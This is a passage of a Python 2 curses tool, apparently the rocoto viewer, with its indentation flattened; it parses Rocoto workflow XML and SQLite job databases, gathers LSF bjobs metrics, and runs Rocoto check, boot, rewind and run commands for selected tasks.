q=c.execute(sql_create_augment_table)
q=c.execute("alter table jobs_augment add column qtime integer;")
q=c.execute("alter table jobs_augment add column cputime integer;")
q=c.execute("alter table jobs_augment add column runtime integer;")
q=c.execute("alter table jobs_augment add column slots integer;")
connection.commit()
c.close()
database_file = filename
return 'now_augmented'
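# Return True if the file looks like an SQLite3 database (checks size and the 16-byte magic header).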
def isSQLite3(filename):
from produtil.fileop import check_file
from produtil.fileop import deliver_file
if not check_file(filename):
return False
if getsize(filename) < 100:
return False
with open(filename, 'rb') as fd:
header = fd.read(100)
fd.close()
if not header[:16] == 'SQLite format 3\x00':
return False
else:
return True
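# Return True if the file contains a 'DOCTYPE workflow' declaration, i.e. looks like a Rocoto XML file.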
def isRocotoWorkflow(filename):
from produtil.fileop import check_file
if not check_file(filename):
return False
with open(filename, 'r') as input:
for line in input:
if 'DOCTYPE workflow' in line:
input.close()
return True
return False
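# Try to import produtil; if it is not already on the path, append the known per-cluster install locations and retry.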
def load_produtil_pythonpath():
try:
import produtil.cluster
return True
except ImportError:
pass
PRODUTIL = collections.defaultdict(list)
PRODUTIL['theia'] = '/scratch4/NCEPDEV/global/save/glopara/svn/nceplibs/produtil/trunk/ush'
PRODUTIL['luna'] = '/gpfs/hps3/emc/global/noscrub/emc.glopara/svn/nceplibs/produtil/trunk/ush'
PRODUTIL['tide'] = '/gpfs/td1/emc/global/save/emc.glopara/svn/nceplibs/produtil/trunk/ush'
PRODUTIL['gyre'] = '/gpfs/gd1/emc/global/save/emc.glopara/svn/nceplibs/produtil/trunk/ush'
try_clusters = ('theia','luna','tide','gyre')
for cluster in try_clusters:
sys.path.append(PRODUTIL[cluster])
try:
import produtil.cluster
return True
except ImportError:
pass
return False
def get_arguments():
from produtil.fileop import check_file
short_opts = "w:d:f:"
long_opts = ["checkfile=","workfolw=","database=","html=","listtasks","onlycheckpoint","help","perfmetrics="]
try:
opts, args = getopt.getopt(sys.argv[1:], short_opts, long_opts)
except getopt.GetoptError as err:
print str(err)
print
usage('SCRIPT IS ABORTING DUE TO UNRECOGNIZED ARGUMENT')
global save_checkfile_path
global use_performance_metrics
workflow_file = None
database_file = None
perfmetrics_on = None
for k, v in opts:
if k in ('-w', '--workflow'):
workflow_file = v
elif k in ('-d','--database'):
database_file = v
elif k in ('-f','--checkfile'):
save_checkfile_path = v
elif k in ('--perfmetrics'):
perfmetrics_on = v
elif k in ('--listtasks'):
global list_tasks
list_tasks = True
elif k in ('--onlycheckpoint'):
global only_check_point
only_check_point = True
elif k in ('--html'):
global html_output
global rzdm_path
global send_html_to_rzdm
send_html_to_rzdm = True
rzdm_path = v
html_output = True
elif k in ('--help'):
usage('')
else:
pass
#usage('OPTION NOT REGOGNIZED')
if perfmetrics_on is None:
use_performance_metrics = False
elif perfmetrics_on.lower() == 'true':
use_performance_metrics = True
elif perfmetrics_on.lower() == 'false':
use_performance_metrics = False
elif perfmetrics_on is not None:
        usage('perfmetrics must be set to either true or false (e.g. --perfmetrics=True)')
send_html_to_rzdm = False
if len(rzdm_path) != 0:
if ':' not in rzdm_path or '@' not in rzdm_path:
print 'No user name or path found for sending html directory to server, no files will be sent to rzdm'
print 'Creating html folder in: %s'%rzdm_path
else:
send_html_to_rzdm = True
if list_tasks and workflow_file is None:
        usage('In order to list tasks you must supply the XML workflow-file')
if only_check_point and (workflow_file is None or database_file is None or save_checkfile_path is None):
        usage('To use the checkpoint output you must specify the workflow, database, and the specific name of the checkpoint file')
if (not list_tasks) and (workflow_file is None or database_file is None):
        usage('Both the database-file and workflow-file must be specified')
if (not list_tasks) and (workflow_file is not None and database_file is not None):
#debug.write('database_file_agmented: '+database_file_agmented+'\n')
if not isSQLite3( database_file ):
            usage('%s is not an SQLite3 database file'%database_file)
if not isRocotoWorkflow( workflow_file ):
            usage('%s is not a Rocoto XML file'%workflow_file)
#global use_multiprocessing
#if getsize(database_file) < 104857600:
# use_multiprocessing = True
#else:
# use_multiprocessing = True
return (workflow_file,database_file )
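# Scan the DTD header of the workflow XML and return a dict of ENTITY name -> value (stops at ']>').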
def get_entity_values( workflow_file ):
entity_values = collections.defaultdict(list)
    with open( workflow_file, 'r' ) as f:
for line in f:
split_line = line.split()
if ']>' in line:
break
if 'ENTITY' in line:
if 'SYSTEM' in line:
value = split_line[3]
else:
value = split_line[2]
entity_values[ split_line[1] ] = value[:-1].replace('"','')
return entity_values
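# Equivalent of timedelta.total_seconds() for Python versions where that method is unavailable.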
def timedelta_total_seconds(timedelta):
return (
timedelta.microseconds + 0.0 +
(timedelta.seconds + timedelta.days * 24 * 3600) * 10 ** 6) / 10 ** 6
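# Query the batch system via bjobs for the user's jobs and return a dict of jobid -> qtime/cputime/runtime/slots.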
def get_aug_perf_values( username ):
from produtil.run import run,runstr, batchexe
    global html_output
global format_keys
cmd = batchexe('which') ['bjobs']
try:
which_bjobs = runstr(cmd).strip()
except Exception,e:
return None
bjobs = collections.defaultdict(dict)
aug_perf = collections.defaultdict(dict)
cmd = batchexe( which_bjobs )['-a','-o',format_string,'-u',username]
bjobs_line = runstr(cmd)
if 'No job found' in bjobs_line:
return None
bjobs_lines = bjobs_line.split('\n')
for l,line in enumerate(bjobs_lines):
split_line = line.split(';')
if l == 0:
format_keys = split_line
continue
for i, value in enumerate(split_line):
if i == 0:
key = value
else:
if format_keys[i] in ('RUN_TIME','CPU_USED'):
value_list = value.split()
if len(value_list) > 1:
value = value_list[0]
bjobs[key][format_keys[i]] = value
sub_time_string = ''
year = str(datetime.datetime.now().year)+' '
sub_time = None
bstart_time = None
for jobid,keys in bjobs.iteritems():
#debug.write(jobid+'\n')
for key in keys:
#debug.write(' '+key+":"+bjobs[jobid][key]+'\n')
try:
int_key = int(bjobs[jobid][key].strip())
str_key = str(int_key)
except:
str_key = bjobs[jobid][key].strip()
if key == 'SUBMIT_TIME':
sub_time_string = str_key
try:
sub_time = datetime.datetime.strptime( year+sub_time_string, '%Y %b %d %H:%M' )
except:
sub_time = None
continue
elif key == 'START_TIME':
bstart_time_string = str_key
try:
bstart_time = datetime.datetime.strptime( year+bstart_time_string, '%Y %b %d %H:%M' )
except:
bstart_time = None
continue
elif key == 'RUN_TIME':
aug_perf[jobid]['runtime'] = str_key
elif key == 'CPU_USED':
aug_perf[jobid]['cputime'] = str_key
elif key == 'SLOTS':
aug_perf[jobid]['slots'] = str_key
if bstart_time_string == sub_time_string:
aug_perf[jobid]['qtime'] = '0'
elif sub_time is not None and bstart_time is None :
try:
aug_perf[jobid]['qtime'] = str(int(( datetime.datetime.now() - sub_time ).total_seconds()))
except AttributeError:
aug_perf[jobid]['qtime'] = str(int(timedelta_total_seconds( datetime.datetime.now() - sub_time )))
elif sub_time is not None and bstart_time is not None:
try:
aug_perf[jobid]['qtime'] = str(int((bstart_time - sub_time).total_seconds()))
except AttributeError:
aug_perf[jobid]['qtime'] = str(int(timedelta_total_seconds(bstart_time - sub_time)))
else:
aug_perf[jobid]['qtime'] = '-'
return aug_perf
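# Draw a pop-up window listing the viewer's key bindings; dismissed with 'q'.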
def help_screen( screen ):
max_row = 25
box_cols = 60
box = curses.newwin( max_row, box_cols , 5, 32 )
box.box()
box.border(0)
box.addstr( 0 , 23, '<q> when done', curses.A_BOLD )
helpstr= [ '<c>heck : run rocotocheck on selected task(s)',
'<b>oot : run rocotoboot on selected task(s)',
'<r>ewind : run rocotorewind on selected task(s)',
'<R>un : run rocotorun on selected task(s)',
' ',
'(->) Next Cycle <d>own (or) Page-dwn to scroll',
'(<-) Previous Cycle <u>own (or) Page-up to scroll ',
' ',
'<Shift> + Arrow Up to selected multiple tasks',
'<Shift> + Arrow Down for using with rocoto utils',
'Double-Click or <x> to expand/collapse metatasks',
' ',
'<ENTER> Selects a task for list or opens meta-task list',
' ',
' When a meta-task list is open for selection:',
               ' Double-Click (or) <s> to select the beginning',
               ' of a range for selection and repeat to complete',
' the desired selected list.',
'',
'<l>oads and renews status data (no rocotorun)',
'<F>inds the last cycle with a running task',
'<U>nloads and clears all previously seleted tasks',
'<f>makes a symlink of log file of highlited task']
for i in range(0,len(helpstr)):
box.addstr( 1+i ,2, helpstr[i] )
x = screen.getch()
while x != ord('q'):
x = screen.getch()
box.refresh()
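# Display a scrollable pick-list of strings and return the updated selection (supports paging, mouse clicks and ranges).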
def list_selector( screen, selected_strings, strings ):
global screen_resized
global mlines
global mcols
global highlightText
global highlightSelectedText
global normalText
def define_box():
if len( strings ) < mlines:
max_row = len( strings )
else:
max_row = mlines - 12
max_mcols = max(18,len(max( strings, key=len )))
if max_mcols + 8 < mcols:
box_cols = max_mcols + 8
else:
box_cols = mcols - 3
box = curses.newwin( max_row + 6, box_cols , 4, 5 )
box.box()
box.border(0)
return box, max_row, box_cols
strings_selected = selected_strings
string_ctr_selected = ''
box, max_row, box_cols = define_box()
row_num = len( strings )
pages = int( ceil( row_num / max_row ) )
position = 1
page = 1
for i in range( 1, max_row+1 ):
if row_num == 0:
box.addstr( 1, 1, "There aren't strings", highlightText )
else:
print_string = ' '+strings[ i - 1 ]+' '
if (i == position):
box.addstr( i+1, 2, print_string, highlightText )
else:
box.addstr( i+1, 2, print_string, normalText )
if i == row_num:
break
screen_resized = False
range_selected = False
string_ctr_selected_prior = ''
x = screen.getch()
while x != ord('q'):
if screen_resized:
screen_resized = False
curses.resizeterm(mlines, mcols)
screen.refresh()
box.clear()
box.erase()
box, max_row, box_cols = define_box()
box.border( 0 )
box.refresh()
if x in ( curses.KEY_SF, curses.KEY_DOWN):
if x == curses.KEY_SF:
string_selected = strings[ position - 1 ]
if string_selected in strings_selected:
string_ctr_selected = ''
try:
if len(strings_selected) > 0:
strings_selected.remove( string_selected )
except ValueError:
pass
else:
strings_selected.append( string_selected )
if page == 1:
if position < i:
position = position + 1
else:
if pages > 1:
page = page + 1
position = 1 + ( max_row * ( page - 1 ) )
elif page == pages:
if position < row_num:
position = position + 1
else:
if position < max_row + ( max_row * ( page - 1 ) ):
position = position + 1
else:
box.erase()
box.border(0)
page = page + 1
position = 1 + ( max_row * ( page - 1 ) )
if x in ( curses.KEY_SR, curses.KEY_UP):
if x == curses.KEY_SR:
string_selected = strings[ position - 1 ]
if string_selected in strings_selected:
try:
if len(strings_selected) > 0:
strings_selected.remove( string_selected )
except ValueError:
pass
else:
strings_selected.append( string_selected )
if page == 1:
if position > 1:
position = position - 1
else:
if position > ( 1 + ( max_row * ( page - 1 ) ) ):
position = position - 1
else:
box.erase()
box.border(0)
page = page - 1
position = max_row + ( max_row * ( page - 1 ) )
if x == curses.KEY_PPAGE:
box.erase()
box.border( 0 )
if page > 1:
page = page - 1
position = 1 + ( max_row * ( page - 1 ) )
if x == curses.KEY_NPAGE:
box.erase()
box.border( 0 )
#screen.refresh()
if page < pages:
page = page + 1
position = ( 1 + ( max_row * ( page - 1 ) ) )
if x in ( curses.KEY_MOUSE, ord('s') ):
mouse_id, mouse_x, mouse_y, mouse_z, button_state = (0,0,0,0,0)
index_prior_selected = 0
if x == curses.KEY_MOUSE:
mouse_id, mouse_x, mouse_y, mouse_z, button_state = curses.getmouse()
box.erase()
box.border( 0 )
pos = mouse_y-5
if page == 1:
position = pos
else:
position = max_row*(page-1)+pos
if x == ord('s') or (button_state & curses.BUTTON1_DOUBLE_CLICKED):
string_ctr_selected = strings[ position - 1 ]
if range_selected:
range_selected = False
string_ctr_selected = ''
if string_ctr_selected != string_ctr_selected_prior:
index_prior_selected = strings.index(string_ctr_selected_prior)
if position < index_prior_selected:
first = position-1
last = index_prior_selected+1
else:
first = index_prior_selected
last = position
for i in range( first, last ):
if strings[i] in strings_selected:
strings_selected.remove(strings[i])
else:
strings_selected.append( strings[i] )
string_ctr_selected_prior = ''
else:
range_selected = True
string_ctr_selected_prior = string_ctr_selected
if x in (curses.KEY_ENTER, 10, 13) and row_num != 0:
box.border( 0 )
string_selected = strings[ position - 1 ]
if string_ctr_selected_prior == string_selected:
string_ctr_selected_prior = ''
range_selected = False
if string_selected in strings_selected:
try:
if len(strings_selected) > 0:
strings_selected.remove( string_selected )
except ValueError:
pass
else:
strings_selected.append( string_selected )
if x == ord('U'):
for each_sting in strings:
if each_sting in strings_selected:
if len(strings_selected) > 0:
strings_selected.remove(each_sting)
for i in range( 1 + ( max_row * ( page - 1 ) ), max_row + 1 + ( max_row * ( page - 1 ) ) ):
if row_num == 0:
box.addstr( 1, 1, "There aren't strings", highlightText )
else:
if strings[ i - 1 ] == string_ctr_selected_prior:
string_print = '* '+strings[ i - 1 ]+' '
else:
string_print = ' '+strings[ i - 1 ]+' '
start_pos = i - ( max_row * ( page - 1 ) ) + 1
if ( i + ( max_row * ( page - 1 ) ) == position + ( max_row * ( page - 1 ) ) ):
box.addstr( start_pos, 2, string_print, highlightText )
else:
box.addstr( start_pos, 2, string_print, normalText )
if strings[ i - 1 ] in strings_selected:
box.addstr( start_pos, 2, string_print[:1] )
box.addstr( start_pos, 4, string_print[2:-1], highlightSelectedText | curses.A_DIM )
if i == row_num:
break
box.addstr( max_row+3 , 2, 'Select with <ENTER> or' )
box.addstr( max_row+4 , 2, '<SHIFT> + <UP/DOWN>' )
box.addstr( 0 , 7, '<q> when done', curses.A_BOLD )
box.refresh()
x = screen.getch()
return strings_selected
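# Run rocotocheck for a single task and cycle and push its output onto queue_check.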
def get_rocoto_check(params, queue_check):
from produtil.run import run,runstr, batchexe, exe
workflow_file, database_file, task, cycle, process = params
cmd=batchexe('rocotocheck')['-v',10,'-w',workflow_file,'-d',database_file,'-c',cycle,'-t',task]
check=runstr(cmd)
if check is None:
curses.endwin()
        print 'rocotocheck failed'
sys.exit(-1)
queue_check.put(check)
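# Run rocotoboot for the selected cycle's tasks and/or metatasks, feeding it a 'y' confirmation from a temporary file.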
def rocoto_boot(params):
from produtil.run import run,runstr, batchexe, exe
workflow_file, database_file, cycle, metatask_list, task_list = params
run( exe('yes') | exe('head')['-1'] > '.yes.txt')
if len(task_list) == 0 and len(metatask_list) != 0:
cmd=batchexe('rocotoboot')['--workflow', workflow_file,'--database',database_file,'--cycles',cycle,'--metatasks', metatask_list] < '.yes.txt'
elif len(task_list) != 0 and len(metatask_list) == 0:
cmd=batchexe('rocotoboot')['--workflow', workflow_file,'--database',database_file,'--cycles',cycle,'--tasks', task_list ] < '.yes.txt'
elif len(task_list) != 0 and len(metatask_list) != 0:
cmd=batchexe('rocotoboot')['--workflow', workflow_file,'--database',database_file,'--cycles',cycle,'--tasks', task_list, '--metatasks', metatask_list ] < '.yes.txt'
else:
        return 'Warning: No metatasks or tasks were selected when rocotoboot was called'
stat=runstr(cmd)
if stat is None:
        display_results( 'rocotoboot failed!!','')
return stat
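# Run rocotorewind for the given cycle with the selected task/metatask arguments and return its output.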
def rocoto_rewind(params):
from produtil.run import run,runstr, batchexe
workflow_file, database_file, cycle, process = params
cmd=batchexe('rocotorewind')['-w',workflow_file,'-d',database_file,'-c',cycle,process]
stat=runstr(cmd)
if stat is None:
        display_results('rocotorewind failed!!','')
return stat
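# Run rocotorun against the workflow XML and database.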
def rocoto_run(params):
from produtil.run import run,runstr, batchexe
workflow_file, database_file = params
cmd=batchexe('rocotorun')['-w',workflow_file,'-d',database_file]
    stat=runstr(cmd)
    if stat is None:
        curses.endwin()
        print 'rocotorun failed'
sys.exit(-1)
return stat
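# Parse the workflow XML and return the ordered list of (task, cycledefs, log) tuples, the metatask membership
# map, and the list of cycles belonging to each cycledef group.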
def get_tasklist(workflow_file):
import produtil.run, produtil.numerics
tasks_ordered = []
metatask_list = collections.defaultdict(list)
tree = ET.parse(workflow_file)
root = tree.getroot()
cycledef_group_cycles = collections.defaultdict(list)
if list_tasks:
curses.endwin()
print
cycle_noname = 'default_cycle'
for child in root:
if child.tag == 'cycledef':
if len(child.attrib) != 0:
cycle_def_name = child.attrib['group']
else:
cycle_def_name = cycle_noname
cycle_string = child.text.split()
ucgs_is_cron = None
if PACKAGE.lower() == 'ugcs':
start_cycle = produtil.numerics.to_datetime ( entity_values['SDATE'] )
end_cycle = produtil.numerics.to_datetime ( entity_values['EDATE'] )
#inc_cycle = produtil.numerics.to_timedelta( entity_values['INC_MONTHS'] )
#NOTE: this is for the special case when cycle for every month
inc_cycle = int(entity_values['INC_MONTHS'])
if inc_cycle == 0:
inc_cycle = produtil.numerics.to_timedelta( cycle_string[2] )
ucgs_is_cron = False
else:
ucgs_is_cron = True
only_once_ugcs = True
else:
start_cycle = produtil.numerics.to_datetime ( cycle_string[0] )
end_cycle = produtil.numerics.to_datetime ( cycle_string[1] )
inc_cycle = produtil.numerics.to_timedelta( cycle_string[2] )
while start_cycle <= end_cycle:
cycledef_group_cycles[cycle_def_name].append(start_cycle.strftime("%Y%m%d%H%M"))
if PACKAGE.lower() == 'ugcs' and ucgs_is_cron:
try:
start_cycle = start_cycle + relativedelta(months=+inc_cycle)
except AttributeError:
curses.endwin()
print;print
                        print 'dateutil, which uses relativedelta to increment monthly (used by UGCS), is not supported with this version of python.\nUse Anaconda instead of the native version in /usr/bin'
sys.exit(-1)
else:
start_cycle = start_cycle + inc_cycle
#if list_tasks:
#print 'cycledef=%s number of cycles %s inc: %s'%(cycle_def_name, len(cycledef_group_cycles[cycle_def_name]),inc_cycle)
#print 'contails cycles',cycledef_group_cycles[cycle_def_name]
if child.tag == 'task':
task_name = child.attrib['name']
log_file = child.find('join').find('cyclestr').text.replace( '@Y@m@d@H','CYCLE' )
#if len(log_file) != 0:
# print 'LOG: %s %s'%( task_name, log_file )
if 'cycledefs' in child.attrib:
task_cycledefs = child.attrib['cycledefs']
#if list_tasks:
# print 'task_cycledefs:',task_cycledefs
else:
task_cycledefs = cycle_noname
if list_tasks:
print task_name,task_cycledefs
#dependancies = child.getiterator('dependency')
#for dependency in dependancies:
# for them in dependency.getchildren():
# print them.attrib
tasks_ordered.append((task_name,task_cycledefs,log_file))
elif child.tag == 'metatask':
all_metatasks_iterator = child.getiterator('metatask')
all_vars = dict() ; all_tasks = []
for i,metatasks in enumerate(all_metatasks_iterator):
metatask_name = 'NO_NAME'
try:
metatask_name = metatasks.attrib['name']
except:
pass
if list_tasks:
print ' '*i+'metatask:',metatask_name
all_vars_list = metatasks.findall('var')
all_tasks_list = metatasks.findall('task')
for var in all_vars_list:
var_list_values = var.text.split()
#print ' '+' '*i+'(%d) var name:'%i,var.attrib['name'],var_list_values
all_vars[var.attrib['name']] = var_list_values
for task in all_tasks_list:
task_name = task.attrib['name']
task_log = task.find('join').find('cyclestr').text.replace( '@Y@m@d@H','CYCLE' )
#if len(task_log) != 0:
# print 'LOG: %s %s'%( task_name, task_log)
#print ' '+' '*i+'(%d) task name:'%i,task.attrib['name']
if 'cycledefs' in task.attrib:
task_cycledefs = task.attrib['cycledefs']
#if list_tasks:
# print 'task_cycledefs (meta):',task_cycledefs
else:
task_cycledefs = cycle_noname
all_tasks.append((task_name,task_cycledefs,task_log))
add_task = []
for task_name in all_tasks:
first_task_resolved = False
first_task_resolved_name = ''
add_task[:] = []
add_task.append(task_name)
for name,vars in all_vars.iteritems():
replace_var = '#'+name+'#'
#print 'TASK_NAME: %s | %s'%(task_name,replace_var)
for each_task_name in add_task:
#for each_task_name in all_tasks:
if replace_var in each_task_name[0]:
for var in vars:
new_task_name = each_task_name[0].replace(replace_var, var)
new_task_log = each_task_name[2].replace(replace_var, var)
add_task.append((new_task_name,each_task_name[1],new_task_log))
for task in add_task:
if '#' not in task[0]:
if task[0] not in [ j[0] for j in tasks_ordered]:
tasks_ordered.append(task)
if not first_task_resolved:
first_task_resolved = True
first_task_resolved_name = task[0]
if metatask_name == 'NO_NAME':
metatask_list[task[0]].append(task[0])
else:
metatask_list[task[0]].append(metatask_name)
metatask_list[task[0]].append(task[0])
else:
metatask_list[first_task_resolved_name].append(task[0])
if list_tasks:
print ' '+' '*i+task[0],task[1],'LOG:',task[2]
    # Default expansion of metatasks: True = collapsed
#for metatask,metatasks in metatask_list.iteritems():
# metatask_list[metatask].append(True)
return tasks_ordered,metatask_list,cycledef_group_cycles
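# Read job state from the Rocoto SQLite database (optionally merged with bjobs performance metrics) and build one
# formatted status line per task per cycle; the result is put on queue_stat, or returned directly when not multiprocessing.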
def get_rocoto_stat(params, queue_stat):
workflow_file, database_file, tasks_ordered, metatask_list, cycledef_group_cycles = params
global temp_workflow_file
global database_file_agmented
if len(tasks_ordered) == 0 or len(metatask_list) == 0 or len(cycledef_group_cycles) == 0 or list_tasks:
tasks_ordered, metatask_list,cycledef_group_cycles = get_tasklist(temp_workflow_file)
if use_performance_metrics:
aug_perf = get_aug_perf_values(get_user)
else:
aug_perf = None
info=collections.defaultdict(list)
cycles=set()
connection=sqlite3.connect(database_file)
c=connection.cursor()
if use_performance_metrics:
q=c.execute("DROP TABLE IF EXISTS jobs_augment_tmp;")
sql_create_augment_table = "CREATE TABLE jobs_augment_tmp AS SELECT * FROM jobs;"
q=c.execute(sql_create_augment_table)
q=c.execute("alter table jobs_augment_tmp add column qtime integer;")
q=c.execute("alter table jobs_augment_tmp add column cputime integer;")
q=c.execute("alter table jobs_augment_tmp add column runtime integer;")
q=c.execute("alter table jobs_augment_tmp add column slots integer;")
sq_command = ''
column_updates = ('qtime','cputime','runtime','slots')
sqlite_merge_command = "%s=(SELECT jobs_augment.%s FROM jobs_augment WHERE jobs_augment.id=jobs_augment_tmp.id)"
for column in column_updates:
sq_command += sqlite_merge_command%(column,column)+','
sq_command=';'.join(sq_command.rsplit(',', 1))
sq_command = 'UPDATE jobs_augment_tmp SET '+sq_command
q=c.execute(sq_command)
sq_command = 'UPDATE jobs_augment_tmp SET '
sqlite_update_command = "%s = '%s' WHERE jobs_augment_tmp.jobid = %s"
#debug.write('WRITING TO DATABASE'+'\n')
for perf_jobid,perf_values in aug_perf.iteritems():
for name,each_value in perf_values.iteritems():
q=c.execute(sq_command+sqlite_update_command%(name,each_value,perf_jobid))
#debug.write('SQL: '+sq_command+sqlite_update_command%(name,each_value,perf_jobid+'\n'))
qinfo=c.execute("DROP TABLE IF EXISTS jobs_augment;")
qinfo=c.execute("ALTER TABLE jobs_augment_tmp RENAME TO jobs_augment;")
cycledifitions = []
q=c.execute('SELECT id, groupname, cycledef FROM cycledef')
for row in q:
(theid, groupname, cycledef) = row
cycledifitions.append( (theid, groupname, cycledef) )
cycle_done_stat = dict()
q=c.execute('SELECT id,cycle,done FROM cycles')
for row in q:
(theid,cycle,done)=row
cycles.add(cycle)
cycle_done_stat[cycle]=done
if use_performance_metrics:
q=c.execute('SELECT id,jobid,taskname,cycle,state,exit_status,duration,tries,qtime,cputime,runtime,slots FROM jobs_augment')
else:
q=c.execute('SELECT id,jobid,taskname,cycle,state,exit_status,duration,tries FROM jobs')
q_get = []
entered_jobids = []
last_task_index = 0
for row in q:
row = tuple('-' if x is None else x for x in row)
if use_performance_metrics:
(theid, jobid,taskname,cycle,state,exit_status,duration,tries,qtime,cputime,runtime,slots)=row
else:
(theid, jobid,taskname,cycle,state,exit_status,duration,tries,)=row
if jobid in entered_jobids:
continue
else:
            if taskname in [x[0] for x in tasks_ordered]:
                task_index = [x[0] for x in tasks_ordered].index(taskname)
#task_index = tasks_ordered.index(taskname)
last_task_index = task_index
else:
task_index = last_task_index
if use_performance_metrics:
q_get.append( (theid,jobid,task_index,taskname,cycle,state,exit_status,duration,tries,qtime,cputime,runtime,slots) )
else:
q_get.append( (theid,jobid,task_index,taskname,cycle,state,exit_status,duration,tries) )
entered_jobids.append(jobid)
q_get.sort( key=lambda x: x[2] )
connection.commit()
c.close()
for row in q_get:
if use_performance_metrics:
(theid,jobid,task_order,taskname,cycle,state,exit_status,duration,tries,qtime,cputime,runtime,slots)=row
else:
(theid,jobid,task_order,taskname,cycle,state,exit_status,duration,tries)=row
if jobid != '-':
if use_performance_metrics:
line = '%s %s %s %s %s %s %s %s %s %s %s'%(datetime.datetime.fromtimestamp(cycle).strftime('%Y%m%d%H%M'),taskname,str(jobid),str(state),str(exit_status),str(tries),str(duration).split('.')[0],str(slots),str(qtime),str(cputime).split('.')[0],str(runtime))
else:
line = '%s %s %s %s %s %s %s'%(datetime.datetime.fromtimestamp(cycle).strftime('%Y%m%d%H%M'),taskname,str(jobid),str(state),str(exit_status),str(tries),str(duration).split('.')[0])
#debug.write('LINE: '+line+'\n')
info[cycle].append(line)
for every_cycle in cycles:
if len(info[every_cycle]) == 0:
info[every_cycle].append('place holder')
new_info=collections.defaultdict(list)
job_ids = []
job_id = ''
for each_cycle,lines_in_cycle in info.iteritems():
for task in tasks_ordered:
skip_task = False
for each_line in lines_in_cycle:
if task[0] == each_line.split()[1]:
#if task[0]+' ' in each_line:
job_id = each_line.split()[2]
if job_id in job_ids:
break
cycle_string = datetime.datetime.fromtimestamp(each_cycle).strftime('%Y%m%d%H%M')
#print 'TESTB:', len(task), task[0],task[1]
cycledefs = task[1].split(',')
if len(cycledefs) > 1:
#print 'Checking if %s for %s is in a gfs cycle:'%(task[0],cycle_string)
for each_cycledef in cycledefs:
#print 'group:', each_cycledef, cycledef_group_cycles[each_cycledef]
if cycle_string in cycledef_group_cycles[each_cycledef]:
#print 'Found:', task[0],'with cycle',cycle_string
new_info[each_cycle].append(each_line)
job_ids.append(job_id)
skip_task = True
break
elif cycle_string in cycledef_group_cycles[task[1]]:
new_info[each_cycle].append(each_line)
job_ids.append(job_id)
skip_task = True
break
if skip_task:
continue
line = datetime.datetime.fromtimestamp(each_cycle).strftime('%Y%m%d%H%M')+' '*7+task[0]+' - - - - -'
cycle_string = datetime.datetime.fromtimestamp(each_cycle).strftime('%Y%m%d%H%M')
cycledefs = task[1].split(',')
if len(cycledefs) > 1:
for each_cycledef in cycledefs:
if cycle_string in cycledef_group_cycles[each_cycledef]:
new_info[each_cycle].append(line)
skip_task = True
break
elif cycle_string in cycledef_group_cycles[task[1]]:
new_info[each_cycle].append(line)
skip_task = True
if skip_task:
continue
rocoto_stat = []
for cycle in sorted(cycles):
if len(new_info[cycle]) != 0:
rocoto_stat.append(new_info[cycle])
if save_checkfile_path is not None:
stat_update_time = str(datetime.datetime.now()).rsplit(':',1)[0]
with open(save_checkfile_path, 'w') as savefile:
rocoto_data_and_time = (rocoto_stat, tasks_ordered, metatask_list,cycledef_group_cycles, stat_update_time)
cPickle.dump(rocoto_data_and_time, savefile)
if only_check_point:
sys.exit(0)
if use_multiprocessing:
queue_stat.put((rocoto_stat, tasks_ordered, metatask_list, cycledef_group_cycles))
else:
return (rocoto_stat, tasks_ordered, metatask_list, cycledef_group_cycles)
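# Show multi-line command output in a scrollable curses pad, with an option to save it to a text file.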
def display_results(results,screen,params):
from produtil.fileop import check_file
results_lines = results.split('\n')
num_lines,num_columns = (len(results_lines)+3,len(max(results_lines, key=len))+1)
pad_pos = 0
force_load_stat = False
global mlines
global mcols
while True:
screen.clear()
screen.refresh()
results_pad = curses.newpad(num_lines,num_columns)
for results_line in results_lines:
results_pad.addstr(results_line+'\n')
results_pad.refresh( pad_pos, 0, 0,0, mlines-3,mcols-1)
extra_1 = extra_2 = ''
if pad_pos < num_lines-mlines-2 or pad_pos > 0:
extra_1 = '<Page Up>/<Page Down> Scroll'
if len(params) != 0:
extra_2 = '<s>ave results to a file'
screen.addstr(mlines-1,0,'<ENTER> Return %s %s'%(extra_1,extra_2),curses.A_BOLD)
event = screen.getch()
if event == curses.KEY_RESIZE:
screen.refresh()
elif event in ( curses.KEY_PPAGE, ord('u') ):
if pad_pos < num_lines-mlines-2:
pad_pos += 1
elif event in ( curses.KEY_NPAGE, ord('d') ):
if pad_pos != 0:
pad_pos -= 1
elif event == curses.KEY_ENTER or event == 10:
screen.clear()
break
elif event == ord('s'):
strg = []
strg.append(PSLOT)
for i in range(2,5):
try:
if ' ' not in basename(params[i]):
strg.append(basename(params[i]).split('.')[0])
except:
pass
if len(strg) == 0:
                strg = 'rocotoviewer_output_file'
save_results_file = '_'.join(strg)+'.txt'
inc_int = 0
while check_file(save_results_file):
if '(%d)'%inc_int in save_results_file:
save_results_file = save_results_file.replace('(%d)'%inc_int,'(%d)'%(inc_int+1))
inc_int += 1
else:
save_results_file = basename(save_results_file.split('.')[0])+'(%d)'%inc_int+'.txt'
out_file = open(save_results_file,'w')
out_file.write(results)
out_file.close()
screen.addstr(mlines-1,0,'Saved file %s'%save_results_file+' '*10)
screen.refresh()
std_time.sleep(0.5)
return
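# Top-level viewer: parse arguments, load produtil, collect the workflow status, then either write an HTML report
# or drive the interactive curses display.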
def main(screen):
global mlines
global mcols
global default_column_length
global use_multiprocessing
global highlightText
global highlightSelectedText
global normalText
global PSLOT
global PACKAGE
global entity_values
event = 10
if not sys.stdin.isatty():
if screen != 'dummy':
print 'There seems to be a problem with the curses init'
sys.exit(-1)
else:
mlines = 100
else:
mlines, mcols = screen.getmaxyx()
#global debug
#PWD = os.getcwd()
#debug = open(PWD+'/debug.log','a',0)
(workflow_file,database_file) = get_arguments()
if not load_produtil_pythonpath():
curses.endwin()
print '\n\nCRITICAL ERROR: The produtil package could not be loaded from your system'
sys.exit(-1)
if html_output:
if sys.stdin.isatty():
curses.endwin()
print '\nPreparing to write out an html folder'
use_multiprocessing = False
import produtil.run, produtil.numerics
from produtil.run import run,runstr, batchexe
from produtil.fileop import check_file, makedirs, deliver_file, remove_file, make_symlinks_in
from produtil.prog import shbackslash
header_string = ' CYCLE TASK JOBID STATE EXIT TRIES DURATION'
header_string_under = '========(updated:tttttttttttttttt)========== PSLOT: pslot ==========================='
global use_performance_metrics
aug_perf = collections.defaultdict(dict)
if use_performance_metrics:
result = augment_SQLite3( database_file )
aug_perf = get_aug_perf_values(get_user)
header_string += ' SLOTS QTIME CPU RUN\n'
header_string_under += '=============================\n'
header_string += header_string_under
default_column_length = 122
else:
aug_perf = None
header_string = header_string+'\n'+header_string_under+'\n'
default_column_length = 91
html_output_dir = None
entity_values = get_entity_values( workflow_file )
